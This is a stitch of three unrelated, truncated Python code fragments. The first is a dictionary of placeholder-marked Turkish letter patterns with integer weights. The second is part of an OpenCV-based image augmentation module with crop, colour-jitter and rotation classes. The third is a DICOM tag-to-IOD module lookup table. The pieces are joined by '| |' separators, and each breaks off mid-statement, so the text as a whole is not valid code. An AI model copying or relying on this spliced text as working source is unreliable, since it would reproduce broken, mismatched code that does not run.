"tXtki": 30, " fXru": 31, "hU sX": 32, "c itX": -33, "i tX ": 34,
"n lXx": 35, "u Xs ": 36, "SundX": 37, "lm X ": 38, "m Xs ": 39,
"okXme": -40, "gOzXc": -41, "zangX": 42, "Xrtum": 43, "S sXz": 44,
"Xtaas": -45, "Xktio": -46, " nXsu": -47, " mayX": -48, "atarX": 49,
"CayXs": 50, " ayhX": 51, "bu X ": 52, "Ors X": 53, "orsXd": 54,
"ergXt": -55, "Xrats": -56, "cXmul": 57, "Xslam": 58, "Xnsan": -59,
"mXstt": -60, "Xltad": -61, "Xnett": 62, "m sXk": -63, "Xlmut": -64,
"CXku ": 65, "evarX": 66, "lXylu": 67, "thXri": 68, "rakX ": -69,
"jektX": 70, "Xrsad": 71, "alXle": -72, "u iCX": -73, "ttXrs": 74,
"65 X ": 75, " bXsl": -76, "Ul Xs": -77, "kXsuf": 78, "Xteki": -79,
"4 tX ": 80, "a kX ": 81, "rUkX ": -82, "kUslX": 83, "rtikX": 84,
"mXsub": 85, " Xndu": 86, "uritX": -87, "OnktX": 88, "sXlie": 89,
"cUdXn": -90, "m Xsk": 91, "ec tX": 92, "mnibX": -93, "Ol dX": 94,
"nU X ": 95, "Xnita": -96, "Oy lX": 97, "bXkat": 98, "yad X": 99,
" itsX": 100, "kU zX": 101, "ogXnk": -102, " cUlX": -103, "cXlus": 104,
"lXkun": -105, "iyedX": 106, "GangX": 107, "pXste": 108, "sXste": 109,
" Xrin": 110, "yergX": -111, "i Xld": 112, "zz tX": 113, "lXsse": 114,
"adOlX": -115, "3 nX ": 116, "bambX": -117, "kXsey": -118, "i Xr ": -119,
" trXk": 120, "yIndX": 121, "mad X": -122, "GardX": 123, "Ok mX": 124,
" rUcX": -125, "tXsev": 126, "hXku ": 127, " Xsst": 128, "hulXl": 129,
"S dXo": 130, "gge X": 131, " Xyke": 132, "U alX": 133, "et X ": 134,
"rC gX": -135, "Xrgem": 136, "ingXs": -137, "Xvero": -138, "ei kX": -139,
"mXkur": -140, "Xiti ": 141, "Xrba ": -142, "sXtre": 143, "13 tX": 144,
"hXmet": 145, "Xhlef": -146, "UC X ": 147, "sfatX": 148, "Xmmuh": 149,
"enusX": 150, "mXhr ": 151, "UslXk": 152, " Xsur": 153, "sXmel": -154,
"ok zX": 155, "0 yX ": 156, "gXlli": -157, "lXzun": -158, "Xtlur": 159,
" 0 tX": -160, "k Xz ": 161, "Xctuu": 162, "huldX": 163, "Xrkua": -164, "ak X ": 165,
"sXkay": -166, "sXled": -167, "tUpsX": 168, "h dXr": -169, "Xhuri": -170, "tol X": 171,
"erkXn": 172, "bXrud": 173, "jOr X": 174, "hXsev": 175, " bXrl": -176,
"ue cX": -177, "StXyu": 178, "n lXm": 179, "Xliyy": 180, " yXne": -181,
"Xresh": -182, " cXr ": 183, "vandX": -184, "Xnifi": -185, "Xngus": 186,
"Xrita": -187, "mi X ": -188, "Xvete": 189, "tXsib": 190, "Ci Xs": 191,
"wandX": -192, "g Xnv": 193, "hi Xn": -194, " klXm": -195, " tUSX": -196,
"tXyug": -197, "n tX ": 198, " g mX": -199, " nXss": 200, "bi X ": -201,
"rm X ": 202, "mkXm ": 203, " I lX": -204, " bXta": -205, "olXme": -206,
"Xtlaa": 207, "uIp X": -208, "dis X": -209, " orgX": -210, "dr zX": 211,
" fXnu": 212, "mI Xb": 213, "n yX ": 214, "yrXl ": 215, "irk X": 216,
"Uks X": 217, "duh X": 218, "zallX": 219, " yXve": 220, "abakX": 221,
" bXto": -222, "ptXn ": 223, "l Xsu": -224, "Uh mX": 225, "m Xnc": 226,
"g yXn": -227, "i hX ": 228, "Xveti": 229, "satXk": -230, "tXnet": 231,
"bXruy": 232, "tXzud": -233, "3 nXn": 234, "kXrts": 235, "Xrruo": 236,
"a mX ": 237, "kap X": -238, " Xlt": -239, "hXkul": 240, "3 yX ": 241,
"Off X": 242, "Xrtee": -243, "Ut kX": -244, "gXlug": -245, "s mX ": 246,
"Ul lX": 247, "mXski": -248, "r dXl": -249, "Xtsu ": 250, "dXkas": -251,
"tUk X": 252, "mXsar": -253, "Xsusm": 254, " m X ": 255, "tf nX": 256,
"r Xlt": -257, "rks X": 258, "prokX": 259, "mXril": -260, "Xruks": 261,
"jI Xc": -262, "be lX": 263, "kabbX": -264, " gXye": -265, "Xroyo": -266,
"hi CX": -267, " Xzga": -268, "kXrtt": 269, "rikXt": 270, "UC lX": 271,
" kXp ": 272, "zut X": -273, "Xyluo": -274, "a dX ": 275, "Ulk X": 276, "izamX": 277,
"zeynX": 278, "yUz X": 279, "rU jX": -280, "ko tX": 281, "ns Xs": 282,
"Ukm X": 283, "Xruri": -284, "di X ": -285, "g sXp": -286, " mXk ": -287,
"asXre": -288, "Sun X": 289, "erg X": 290, "sellX": 291, "Xtayi": -292,
"s Xsl": -293, "Xlali": -294, "e rXb": 295, "r Xss": 296, "rls X": 297,
"bdulX": 298, "k h X": 299, "y tXb": -300, "ytemX": 301, "e tX ": 302,
"gXrba": -303, "IS pX": -304, "sXylu": 305, "mXcu ": -306, " mX ": 307,
"lorX ": 308, " Xcuy": -309, "yekXm": -310, "ee tX": 311, "gs bX": -312,
" indX": -313, "gXri ": -314, "m Xnv": 315, "Ip Xn": 316, "UrtCX": 317,
"Xzari": 318, "rU hX": 319, " hXru": -320, "polXn": 321, "Xlca ": -322,
"ot lX": -323, "kXlel": -324, "mXbil": -325, "gXrke": -326, "Xterl": 327,
"mXzlu": -328, "Se Xm": 329, " hUdX": -330, "n rX ": -331, "r pXt": -332,
"e Xhu": 333, "lt lX": 334, "ova X": 335, "kXrse": 336, "to sX": -337,
"Xskum": -338, "Xdusu": 339, "Xretc": 340, "r izX": 341, "kXlut": 342,
"laykX": 343, "rmatX": 344, "rIS X": -345, "ze Xs": 346, "kXmbe": 347,
"rXtuk": 348, " Xcus": -349, "Xbeyr": -350, "ef Xn": 351, "rkXte": 352,
"Xlas ": -353, "tI X ": 354, "aribX": -355, "kulXy": -356, "orlXr": 357,
"n sXk": 358, "Xturo": 359, "kXbiz": 360, "l p X": 361, "Xzaya": -362,
"m alX": 363, "ul gX": 364, "rn mX": 365, "Xnsel": 366, "mXsab": 367,
"tU tX": 368, "C kXs": -369, "n Xf ": 370, "m Xct": 371, "fi Xc": -372,
"eS Xn": 373, "Xdus ": -374, "sormX": -375, "s dXr": -376, "Xrge ": 377,
"Xrkos": -378, "ore X": -379, "k dX ": 380, "sla X": -381, "00 fX": 382,
"mXral": -383, "age X": -384, "tXnc ": -385, "mXhen": 386, "SaygX": 387,
"elXcl": 388, "Xmdan": -389, "l alX": 390, "lektX": 391, "ur rX": -392, "mXrsa": -393,
"UtXne": 394, "nSUmX": -395, "Xlak ": -396, "su gX": 397, "Xrsan": -398,
"mXrid": 399, "igXre": -400, "a gX ": -401, " kXre": 402, " kXnu": 403,
"mXssa": -404, "Xvenc": 405, "Xrmes": 406, "Xrgul": -407, "epeX": 408,
"acXm": 409, "Xrrt": 410, "Xmob": -411, "anXp": 412, "Xfam": 413,
"pXrn": 414, "nnXk": -415, "rtdX": -416, "fUcX": -417, "fXcu": 418,
"rtcX": 419, "mXmm": -420, "mXif": 421, "cz X": 422, "lXrr": 423,
"nyXa": 424, "ulCX": -425, "Xsef": 426, "Xsfa": -427, "lksX": 428,
"cXpe": -429, "OSrX": 430, " Xnt": 431, "gXbb": -432, "hinX": -433,
"OStX": 434, "kekX": | |
len(size) == 2, "Please provide only two dimensions (h, w) for size."
self.size = size
def __call__(self, img):
return F.five_crop(img, self.size)
def __repr__(self):
return self.__class__.__name__ + '(size={0})'.format(self.size)
class TenCrop(object):
"""Crop the given numpy ndarray into four corners and the central crop plus the flipped version of
these (horizontal flipping is used by default)
.. Note::
This transform returns a tuple of images and there may be a mismatch in the number of
inputs and targets your Dataset returns. See below for an example of how to deal with
this.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
vertical_flip(bool): Use vertical flipping instead of horizontal
Example:
>>> transform = Compose([
>>> TenCrop(size), # this is a list of PIL Images
>>> Lambda(lambda crops: torch.stack([ToTensor()(crop) for crop in crops])) # returns a 4D tensor
>>> ])
>>> #In your test loop you can do the following:
>>> input, target = batch # input is a 5d tensor, target is 2d
>>> bs, ncrops, c, h, w = input.size()
>>> result = model(input.view(-1, c, h, w)) # fuse batch size and ncrops
>>> result_avg = result.view(bs, ncrops, -1).mean(1) # avg over crops
"""
def __init__(self, size, vertical_flip=False):
self.size = size
if isinstance(size, numbers.Number):
self.size = (int(size), int(size))
else:
assert len(size) == 2, "Please provide only two dimensions (h, w) for size."
self.size = size
self.vertical_flip = vertical_flip
def __call__(self, img):
return F.ten_crop(img, self.size, self.vertical_flip)
def __repr__(self):
return self.__class__.__name__ + '(size={0}, vertical_flip={1})'.format(self.size, self.vertical_flip)
class LinearTransformation(object):
"""Transform a tensor image with a square transformation matrix computed
offline.
Given transformation_matrix, will flatten the torch.*Tensor, compute the dot
product with the transformation matrix and reshape the tensor to its
original shape.
Applications:
- whitening: zero-center the data, compute the data covariance matrix
[D x D] with np.dot(X.T, X), perform SVD on this matrix and
pass it as transformation_matrix.
Args:
transformation_matrix (Tensor): tensor [D x D], D = C x H x W
"""
def __init__(self, transformation_matrix):
if transformation_matrix.size(0) != transformation_matrix.size(1):
raise ValueError("transformation_matrix should be square. Got " +
"[{} x {}] rectangular matrix.".format(*transformation_matrix.size()))
self.transformation_matrix = transformation_matrix
def __call__(self, tensor):
"""
Args:
tensor (Tensor): Tensor image of size (C, H, W) to be whitened.
Returns:
Tensor: Transformed image.
"""
if tensor.size(0) * tensor.size(1) * tensor.size(2) != self.transformation_matrix.size(0):
raise ValueError("tensor and transformation matrix have incompatible shape." +
"[{} x {} x {}] != ".format(*tensor.size()) +
"{}".format(self.transformation_matrix.size(0)))
flat_tensor = tensor.view(1, -1)
transformed_tensor = torch.mm(flat_tensor, self.transformation_matrix)
tensor = transformed_tensor.view(tensor.size())
return tensor
def __repr__(self):
format_string = self.__class__.__name__ + '('
format_string += (str(self.transformation_matrix.numpy().tolist()) + ')')
return format_string
class ColorJitter(object):
"""Randomly change the brightness, contrast and saturation of an image.
Args:
brightness (float or tuple of float (min, max)): How much to jitter brightness.
brightness_factor is chosen uniformly from [max(0, 1 - brightness), 1 + brightness]
or the given [min, max]. (Should be non negative numbers).
contrast (float or tuple of float (min, max)): How much to jitter contrast.
contrast_factor is chosen uniformly from [max(0, 1 - contrast), 1 + contrast]
(or the given [min, max]. Should be non negative numbers).
saturation (float or tuple of float (min, max)): How much to jitter saturation.
saturation_factor is chosen uniformly from [max(0, 1 - saturation), 1 + saturation]
(or the given [min, max]. Should be non negative numbers.)
hue (float or tuple of float (min, max)): How much to jitter hue.
hue_factor is chosen uniformly from [-hue, hue] or the given [min, max].
Should have 0<= hue <= 0.5 or -0.5 <= min <= max <= 0.5.
"""
def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):
self.brightness = self._check_input(brightness, 'brightness')
# self.brightness = brightness
self.contrast = self._check_input(contrast, 'contrast')
# self.contrast = contrast
self.saturation = self._check_input(saturation, 'saturation')
# self.saturation = saturation
self.hue = self._check_input(hue, 'hue', center=0, bound=(-0.5, 0.5),
clip_first_on_zero=False)
# self.hue = hue
if self.saturation is not None:
warnings.warn('Saturation jitter enabled. Will slow down loading immensely.')
if self.hue is not None:
warnings.warn('Hue jitter enabled. Will slow down loading immensely.')
def _check_input(self, value, name, center=1, bound=(0, float('inf')), clip_first_on_zero=True):
if isinstance(value, numbers.Number):
if value < 0:
raise ValueError("If {} is a single number, it must be non negative.".format(name))
value = [center - value, center + value]
if clip_first_on_zero:
value[0] = max(value[0], 0)
elif isinstance(value, (tuple, list)) and len(value) == 2:
if not bound[0] <= value[0] <= value[1] <= bound[1]:
raise ValueError("{} values should be between {}".format(name, bound))
else:
raise TypeError("{} should be a single number or a list/tuple with length 2.".format(name))
# if value is 0 or (1., 1.) for brightness/contrast/saturation
# or (0., 0.) for hue, do nothing
if value[0] == value[1] == center:
value = None
return value
@staticmethod
def get_params(brightness, contrast, saturation, hue):
"""Get a randomized transform to be applied on image.
Arguments are same as that of __init__.
Returns:
Transform which randomly adjusts brightness, contrast and
saturation in a random order.
"""
transforms = []
if brightness is not None: # if brightness > 0:
brightness_factor = random.uniform(brightness[0], brightness[1])
# brightness_factor = random.uniform(max(0, 1 - brightness), 1 + brightness)
transforms.append(Lambda(lambda img: F.adjust_brightness(img, brightness_factor)))
if contrast is not None: # if contrast > 0:
contrast_factor = random.uniform(contrast[0], contrast[1])
# contrast_factor = random.uniform(max(0, 1 - contrast), 1 + contrast)
transforms.append(Lambda(lambda img: F.adjust_contrast(img, contrast_factor)))
if saturation is not None: # if saturation > 0:
saturation_factor = random.uniform(saturation[0], saturation[1])
# saturation_factor = random.uniform(max(0, 1 - saturation), 1 + saturation)
transforms.append(Lambda(lambda img: F.adjust_saturation(img, saturation_factor)))
if hue is not None: # if hue > 0:
hue_factor = random.uniform(hue[0], hue[1])
# hue_factor = random.uniform(-hue, hue)
transforms.append(Lambda(lambda img: F.adjust_hue(img, hue_factor)))
random.shuffle(transforms)
transform = Compose(transforms)
return transform
def __call__(self, img):
"""
Args:
img (numpy ndarray): Input image.
Returns:
numpy ndarray: Color jittered image.
"""
transform = self.get_params(self.brightness, self.contrast,
self.saturation, self.hue)
return transform(img)
def __repr__(self):
format_string = self.__class__.__name__ + '('
format_string += 'brightness={0}'.format(self.brightness)
format_string += ', contrast={0}'.format(self.contrast)
format_string += ', saturation={0}'.format(self.saturation)
format_string += ', hue={0})'.format(self.hue)
return format_string
class RandomRotation(object):
"""Rotate the image by angle.
Args:
degrees (sequence or float or int): Range of degrees to select from.
If degrees is a number instead of sequence like (min, max), the range of degrees
will be (-degrees, +degrees) clockwise order.
resample ({cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_LANCZOS4}, optional):
An optional resampling filter. #See `filters`_ for more information.
If omitted, or if the image has mode "1" or "P", it is set to cv2.INTER_NEAREST.
expand (bool, optional): Optional expansion flag.
If true, expands the output to make it large enough to hold the entire rotated image.
If false or omitted, make the output image the same size as the input image.
Note that the expand flag assumes rotation around the center and no translation.
center (2-tuple, optional): Optional center of rotation.
Origin is the upper left corner.
Default is the center of the image.
"""
def __init__(self, degrees, resample=cv2.INTER_NEAREST, expand=False, center=None):
# def __init__(self, degrees, resample='BILINEAR', expand=False, center=None):
if isinstance(degrees, numbers.Number):
if degrees < 0:
raise ValueError("If degrees is a single number, it must be positive.")
self.degrees = (-degrees, degrees)
else:
if len(degrees) != 2:
raise ValueError("If degrees is a sequence, it must be of len 2.")
self.degrees = degrees
self.resample = resample
self.expand = expand
self.center = center
@staticmethod
def get_params(degrees):
"""Get parameters for ``rotate`` for a random rotation.
Returns:
sequence: params to be passed to ``rotate`` for random rotation.
"""
angle = random.uniform(degrees[0], degrees[1])
return angle
def __call__(self, img):
"""
img (numpy ndarray): Image to be rotated.
Returns:
numpy ndarray: Rotated image.
"""
angle = self.get_params(self.degrees)
return F.rotate(img, angle, self.resample, self.expand, self.center)
def __repr__(self):
format_string = self.__class__.__name__ + '(degrees={0}'.format(self.degrees)
format_string += ', resample={0}'.format(self.resample)
format_string += ', expand={0}'.format(self.expand)
if self.center is not None:
format_string += ', center={0}'.format(self.center)
format_string += ')'
return format_string
class RandomAffine(object):
"""Random affine transformation of the image keeping center invariant
Args:
degrees (sequence or float or int): Range | |
X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Patient'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Patient'],
'BASIC TEXT SR IOD': ['Patient'],
'NM IMAGE IOD': ['Patient'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'LENSOMETRY MEASUREMENTS IOD': ['Patient'],
'MR SPECTROSCOPY IOD': ['Patient'],
'ENCAPSULATED PDF IOD': ['Patient'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CHEST CAD SR IOD': ['Patient'],
'HEMODYNAMIC IOD': ['Patient'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Patient'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Patient'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Patient'],
'ENHANCED MR COLOR IMAGE IOD': ['Patient'],
'ENHANCED CT IMAGE IOD': ['Patient'],
'X-RAY RADIATION DOSE SR IOD': ['Patient'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Patient'],
'PROCEDURE LOG IOD': ['Patient'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Patient'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Patient'],
'STEREOMETRIC RELATIONSHIP IOD': ['Patient'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Patient'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Patient'],
'VL ENDOSCOPIC IMAGE IOD': ['Patient'],
'KERATOMETRY MEASUREMENTS IOD': ['Patient'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Patient'],
'COMPREHENSIVE SR IOD': ['Patient'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Patient'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Patient'],
'SPATIAL FIDUCIALS IOD': ['Patient'],
'RT ION PLAN IOD': ['Patient'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CT IMAGE IOD': ['Patient'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Patient'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Patient'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Patient'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'RT DOSE IOD': ['Patient'],
'AMBULATORY ECG IOD': ['Patient'],
'SURFACE SEGMENTATION IOD': ['Patient'],
'MAMMOGRAPHY CAD SR IOD': ['Patient'],
'VL MICROSCOPIC IMAGE IOD': ['Patient'],
'RT BEAMS TREATMENT RECORD IOD': ['Patient'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Patient'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'RT IMAGE IOD': ['Patient'],
'SC IMAGE IOD': ['Patient'],
None: ['Patient'],
'SEGMENTATION IOD': ['Patient'],
'PET IMAGE IOD': ['Patient'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'DIGITAL X-RAY IMAGE IOD': ['Patient'],
'REAL WORLD VALUE MAPPING IOD': ['Patient'],
'SPATIAL REGISTRATION IOD': ['Patient'],
'COLON CAD SR IOD': ['Patient'],
'INTRAVASCULAR OCT IMAGE IOD': ['Patient'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'ENHANCED PET IMAGE IOD': ['Patient'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Patient'],
'US MULTI-FRAME IMAGE IOD': ['Patient'],
'ENHANCED X-RAY RF IMAGE IOD': ['Patient'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Patient'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Patient'],
'US IMAGE IOD': ['Patient'],
'GENERAL ECG IOD': ['Patient'],
'XRF IMAGE IOD': ['Patient'],
'ENCAPSULATED CDA IOD': ['Patient'],
'ENHANCED SR IOD': ['Patient'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'GENERAL AUDIO WAVEFORM IOD': ['Patient'],
'MR IMAGE IOD': ['Patient'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Patient'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Patient'],
'ARTERIAL PULSE WAVEFORM IOD': ['Patient'],
},
# ResponsibleOrganization
0x00102299L: {
'BASIC STRUCTURED DISPLAY IOD': ['Patient'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Patient'],
'RT BRACHY TREATMENT RECORD IOD': ['Patient'],
'RT STRUCTURE SET IOD': ['Patient'],
'RT PLAN IOD': ['Patient'],
'CR IMAGE IOD': ['Patient'],
'RAW DATA IOD': ['Patient'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Patient'],
'ENHANCED MR IMAGE IOD': ['Patient'],
'BASIC CARDIAC EP IOD': ['Patient'],
'RT TREATMENT SUMMARY RECORD IOD': ['Patient'],
'12-LEAD ECG IOD': ['Patient'],
'RESPIRATORY WAVEFORM IOD': ['Patient'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Patient'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Patient'],
'BASIC VOICE AUDIO IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Patient'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Patient'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Patient'],
'BASIC TEXT SR IOD': ['Patient'],
'NM IMAGE IOD': ['Patient'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'LENSOMETRY MEASUREMENTS IOD': ['Patient'],
'MR SPECTROSCOPY IOD': ['Patient'],
'ENCAPSULATED PDF IOD': ['Patient'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CHEST CAD SR IOD': ['Patient'],
'HEMODYNAMIC IOD': ['Patient'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Patient'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Patient'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Patient'],
'ENHANCED MR COLOR IMAGE IOD': ['Patient'],
'ENHANCED CT IMAGE IOD': ['Patient'],
'X-RAY RADIATION DOSE SR IOD': ['Patient'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Patient'],
'PROCEDURE LOG IOD': ['Patient'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Patient'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Patient'],
'STEREOMETRIC RELATIONSHIP IOD': ['Patient'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Patient'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Patient'],
'VL ENDOSCOPIC IMAGE IOD': ['Patient'],
'KERATOMETRY MEASUREMENTS IOD': ['Patient'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Patient'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Patient'],
'COMPREHENSIVE SR IOD': ['Patient'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Patient'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Patient'],
'SPATIAL FIDUCIALS IOD': ['Patient'],
'RT ION PLAN IOD': ['Patient'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Patient'],
'CT IMAGE IOD': ['Patient'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Patient'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Patient'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Patient'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'RT DOSE IOD': ['Patient'],
'AMBULATORY ECG IOD': ['Patient'],
'SURFACE SEGMENTATION IOD': ['Patient'],
'MAMMOGRAPHY CAD SR IOD': ['Patient'],
'VL MICROSCOPIC IMAGE IOD': ['Patient'],
'RT BEAMS TREATMENT RECORD IOD': ['Patient'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Patient'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'RT IMAGE IOD': ['Patient'],
'SC IMAGE IOD': ['Patient'],
None: ['Patient'],
'SEGMENTATION IOD': ['Patient'],
'PET IMAGE IOD': ['Patient'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'DIGITAL X-RAY IMAGE IOD': ['Patient'],
'REAL WORLD VALUE MAPPING IOD': ['Patient'],
'SPATIAL REGISTRATION IOD': ['Patient'],
'COLON CAD SR IOD': ['Patient'],
'INTRAVASCULAR OCT IMAGE IOD': ['Patient'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Patient'],
'ENHANCED PET IMAGE IOD': ['Patient'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Patient'],
'US MULTI-FRAME IMAGE IOD': ['Patient'],
'ENHANCED X-RAY RF IMAGE IOD': ['Patient'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Patient'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Patient'],
'US IMAGE IOD': ['Patient'],
'GENERAL ECG IOD': ['Patient'],
'XRF IMAGE IOD': ['Patient'],
'ENCAPSULATED CDA IOD': ['Patient'],
'ENHANCED SR IOD': ['Patient'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Patient'],
'GENERAL AUDIO WAVEFORM IOD': ['Patient'],
'MR IMAGE IOD': ['Patient'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Patient'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Patient'],
'ARTERIAL PULSE WAVEFORM IOD': ['Patient'],
},
# IlluminationTypeCodeSequence
0x00220016L: {
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Image'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Image'],
None: ['Image'],
},
# TypeOfDetectorMotion
0x00540202L: {
'NM IMAGE IOD': ['Image'],
'ENHANCED PET IMAGE IOD': ['Image'],
'PET IMAGE IOD': ['Series'],
None: ['Image', 'Series'],
},
# ScheduledProcedureStepStartDateTime
0x00404005L: {
'UNIFIED PROCEDURE STEP IOD': ['Unified Procedure Step'],
'GENERAL PURPOSE SCHEDULED PROCEDURE STEP IOD': ['General Purpose Scheduled Procedure Step'],
None: ['Unified Procedure Step', 'General Purpose Scheduled Procedure Step'],
},
# TerminationRelativeDensityThreshold
0x00189721L: {
'ENHANCED PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# BreastImplantPresent
0x00281300L: {
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Image'],
None: ['Image'],
},
# RectilinearPhaseEncodeReordering
0x00189034L: {
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'ENHANCED MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# ImplantRegulatoryDisapprovalCodeSequence
0x006862A0L: {
'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'],
None: ['Implant Template'],
},
# CalculatedDoseReferenceSequence
0x30080070L: {
'RT BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
'RT BRACHY TREATMENT RECORD IOD': ['Treatment Record'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Treatment Record'],
None: ['Treatment Record'],
},
# ReasonForPerformedProcedureCodeSequence
0x00401012L: {
'BASIC STRUCTURED DISPLAY IOD': ['Study'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Study'],
'RT BRACHY TREATMENT RECORD IOD': ['Study'],
'RT STRUCTURE SET IOD': ['Study'],
'RT PLAN IOD': ['Study'],
'CR IMAGE IOD': ['Study'],
'RAW DATA IOD': ['Study'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Study'],
'ENHANCED MR IMAGE IOD': ['Study'],
'BASIC CARDIAC EP IOD': ['Study'],
'RT TREATMENT SUMMARY RECORD IOD': ['Study'],
'MODALITY PERFORMED PROCEDURE STEP IOD': ['Modality Performed Procedure Step'],
'12-LEAD ECG IOD': ['Study'],
'RESPIRATORY WAVEFORM IOD': ['Study'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Study'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Study'],
'BASIC VOICE AUDIO IOD': ['Study'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Study'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Study'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Study'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Study'],
'SPECTACLE PRESCIPTION REPORT IOD': ['Study'],
'BASIC TEXT SR IOD': ['Study'],
'NM IMAGE IOD': ['Study'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'LENSOMETRY MEASUREMENTS IOD': ['Study'],
'MR SPECTROSCOPY IOD': ['Study'],
'ENCAPSULATED PDF IOD': ['Study'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Study'],
'CHEST CAD SR IOD': ['Study'],
'HEMODYNAMIC IOD': ['Study'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Study'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Study'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Study'],
'ENHANCED MR COLOR IMAGE IOD': ['Study'],
